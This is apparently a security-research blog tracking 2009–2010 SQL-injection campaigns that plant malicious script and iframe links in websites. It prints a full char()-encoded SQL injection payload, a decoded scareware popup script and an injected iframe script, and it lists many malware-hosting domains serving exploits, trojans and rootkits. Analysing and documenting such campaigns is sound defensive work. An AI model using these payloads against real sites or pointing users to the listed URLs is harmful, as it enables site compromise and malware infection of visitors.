s3c-watch

nutcountry.ru

s3cu — Mon, 02 Aug 2010 13:57:10 +0000

sql-injection of iframe links – http://nutcountry.ru:8080/index.php?pid=13

the domain is currently not resolvable.

google-analytiics.com

s3cu — Thu, 14 Jan 2010 17:00:12 +0000

Notice the 2 ‘i’ in the domain?

The sql-injection attack comes in the form

set+variable=cast(variable+as+varchar(8000))%2Bcast(char(060)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(116)%2Bchar(121)%2Bchar(112)%2Bchar(101)%2Bchar(61)%2Bchar(34)%2Bchar(116)%2Bchar(101)%2Bchar(120)%2Bchar(116)%2Bchar(47)%2Bchar(106)%2Bchar(97)%2Bchar(118)%2Bchar(97)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(34)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(34)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(97)%2Bchar(110)%2Bchar(97)%2Bchar(108)%2Bchar(121)%2Bchar(116)%2Bchar(105)%2Bchar(105)%2Bchar(99)%2Bchar(115)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(99)%2Bchar(104)%2Bchar(105)%2Bchar(110)%2Bchar(46)%2Bchar(106)%2Bchar(115)%2Bchar(34)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)+as+varchar(8000))

The string of char() can be easily decoded as

The malicious javascript “urchin.js” is obtained and decoded as follows:
function PopShow3() { CookieTest=navigator.cookieEnabled; if(CookieTest) { ClickUndercookie = GetCookie('clickunder2'); if (ClickUndercookie == null) { var ExpDate = new Date (); ExpDate.setTime(ExpDate.getTime() + 365 * 24 * 60 * 60 * 1000); SetCookie('clickunder2','1',ExpDate, "/"); window.open("javascript:location.href='http://best-youtubevideo.com/?pid=422&sid=4fd257';","PopWin3","resizable=1,toolbar=1,location=1,menubar=1,status=1,scrollbars=1'"); window.focus(); } } } function GetCookie (name) { var arg = name + "="; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return getCookieVal (j); i = document.cookie.indexOf(" ", i) + 1; if (i == 0) break; } return null; } function SetCookie (name, value) { var argv = SetCookie.arguments; var argc = SetCookie.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; document.cookie = name + "=" + escape (value) + ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) + ((path == null) ? "" : ("; path=" + path)) + ((domain == null) ? "" : ("; domain=" + domain)) + ((secure == true) ? "; secure" : ""); } document.onmouseup=PopShow3;

The above script opens a popup window from “best-youtubevideo.com” domain, however it is redirected to “scanner-antivirusw1.com”. This leads to scareware that scares people to install the malware.

z360.net/a.js

s3cu — Tue, 01 Sep 2009 16:21:47 +0000

this injected script also has several associated domains

dd45h.8866.org/fkzd/16.htm
wm.1kfie.cn/x150/xx.html

One of the exploit downloads a rootkit from d.cdwsx.com/xx/x150.css [VT Analysis]

k.18xn.com/x.js

s3cu — Tue, 01 Sep 2009 15:58:23 +0000

active sql-injection attack.

Injected scripts and exploits iframe to several urls such as:

www.gehae.info/fox/index.html
www.haerh.info/mam.exe

the scripts generate some form of ‘time-based’ parameters that probably is only available for a brief period.

The trojan downloader from www.haerh.info get a list of evil programs from www.gehae.info/2.txt

a0v.org/x.js

s3cu — Thu, 23 Jul 2009 15:42:10 +0000

another round of sql-injection attacks.

x.js calls iframe src www.jejsaj.com/ya/index.html

jejsaj contains various exploits targeting among others

owc 0-day
realplayer
msvidctl.dll

the exploits download trojans from www.wowand.com

f1y.in/j.js

s3cu — Sat, 11 Jul 2009 04:17:26 +0000

another round of sql-injection attempt

Update: beware of this malicious script as it is making use of OWC 0-day.
Ref – http://isc.sans.org/diary.html?storyid=6811

218.213.77.96/a.js

s3cu — Thu, 28 May 2009 14:10:17 +0000

a recent round of sql-injected link.
a.js links in more iframes which exploits the typical basket of exploits, targeting flash, IE7, snapshot viewer, realplayer, etc.

Ultimately the exploits installs a trojan [VT analysis]

3b3.org/c.js

s3cu — Thu, 16 Apr 2009 13:46:45 +0000

This sql-injected script src has been around for some time.

The interesting point of this script is that it behaves differently if the injected site is from “.gov.cn” or “.edu.cn”. Code as shown below:

var s,siteUrl,tmpdomain; var arydomain = new Array(".gov.cn",".edu.cn"); s = document.location+""; siteUrl=s.substring(7,s.indexOf('/',7)); tmpdomain = 0; for(var i=0;i { if(siteUrl.indexOf(arydomain[i]) > -1){ tmpdomain = 1; break; } } if(tmpdomain == 0){ document.writeln(" iframe>"); function rl() { var msgObj = document.createElement("div"); msgObj.setAttribute("id","msgDiv"); document.body.appendChild(msgObj); var obj = document.getElementById("msgDiv"); obj.innerHTML =" iframe>"; } setInterval("rl()",10000); }

The injected iframe a100.htm inserts another iframe au.htm.

au.htm deploys another obfuscation technique, which is to embed null bytes into the file. The top portion of the file is as shown:

If all the bytes 00 are removed, you get back a beautiful html file.

au.htm contains links to exploits of typical vulnerabilities. One malicious file that will be downloaded is http://xia8866.com/xia/f5.css [Threatexpert result]

cn0093.cn/v.js

s3cu — Mon, 09 Mar 2009 14:50:40 +0000

following previous post, a new injected script has emerged that resolves to same IP.

v.js retrieves another iframe src www.vieio.cn/i.htm.

This exploitation kit tries to avoid detection by splitting each respective exploit into 2 files. One .htm and .js

tsnse.cn/i.js

s3cu — Thu, 05 Mar 2009 15:37:46 +0000

This sql-injected script calls iframe www.gomne.cn/yh.htm

yh.htm has the same vulnerability exploits as the previous post. Most likely from the same kit.

The exploits download malicious executable from www.at820.cn/wins.exe [VT results]

CWSandbox analysis of wins.exe shows further download such as rootkit www.at820.cn/ie.exe [VT results]

Note that all 3 domains tsnse.cn, www.gomne.cn and www.at820.cn resolve to the same IP address 120.50.35.138.